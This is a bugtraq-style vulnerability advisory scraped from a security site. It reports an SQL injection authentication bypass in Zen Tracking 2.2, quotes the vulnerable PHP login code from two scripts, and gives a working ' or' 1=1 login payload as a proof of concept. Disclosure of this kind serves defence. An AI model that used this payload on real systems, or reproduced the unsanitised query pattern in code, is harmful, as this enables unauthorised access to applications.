|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : cr4wl3r SecurityRisk : High  (About) Remote : Yes Local : No Status : Bug
Text : [+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org> [+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/ [+] Vuln Code : [userlogin.php] if (!empty($_POST['password'])) { $username =$_POST['username']; $password =$_POST['password']; dbConnect(); $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'". mysql_error()); [+] PoC : [ZenTracking_path]/userlogin.php username: ' or' 1=1 Password: ' or' 1=1 [+] Vuln Code : [managerlogin.php] if (!empty($_POST['password'])) { $username =$_POST['username']; $password =$_POST['password']; dbConnect(); $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'". mysql_error()); [+] PoC : [ZenTracking_path]/managerlogin.php username: ' or' 1=1 Password: ' or' 1=1 Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |